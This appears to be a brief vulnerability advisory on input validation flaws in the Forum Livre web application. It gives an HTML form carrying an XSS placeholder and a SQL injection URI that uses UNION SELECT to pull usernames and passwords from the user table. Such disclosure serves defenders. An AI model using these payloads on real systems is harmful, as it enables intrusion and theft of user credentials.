|
|
Forum Livre Multiple Input Validation Vulnerabilities
To exploit an HTML-injection issue: An attacker can exploit this issue via a web client. An HTTP POST example has been provided: http://www.example.com <form method="POST" action="http://[TARGET]/[path]/busca2.asp"> <input type="text" name="palavra" value="[#]XSS HERE[#]"> <input type="radio" value="all" name="tipo" checked> <input type="radio" value="some" name="tipo"> <select size="1" name="forum"> <option value="">Todos os foruns</option> <option value="">Forum ComCatz</option> <input type="submit" value="Investigar" name="B1"> </form> To exploit a SQL-injection issue: An attacker can exploit this issue via a web client. An example URI has been provided: http://www.example.com/info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario |
|
Privacy Statement |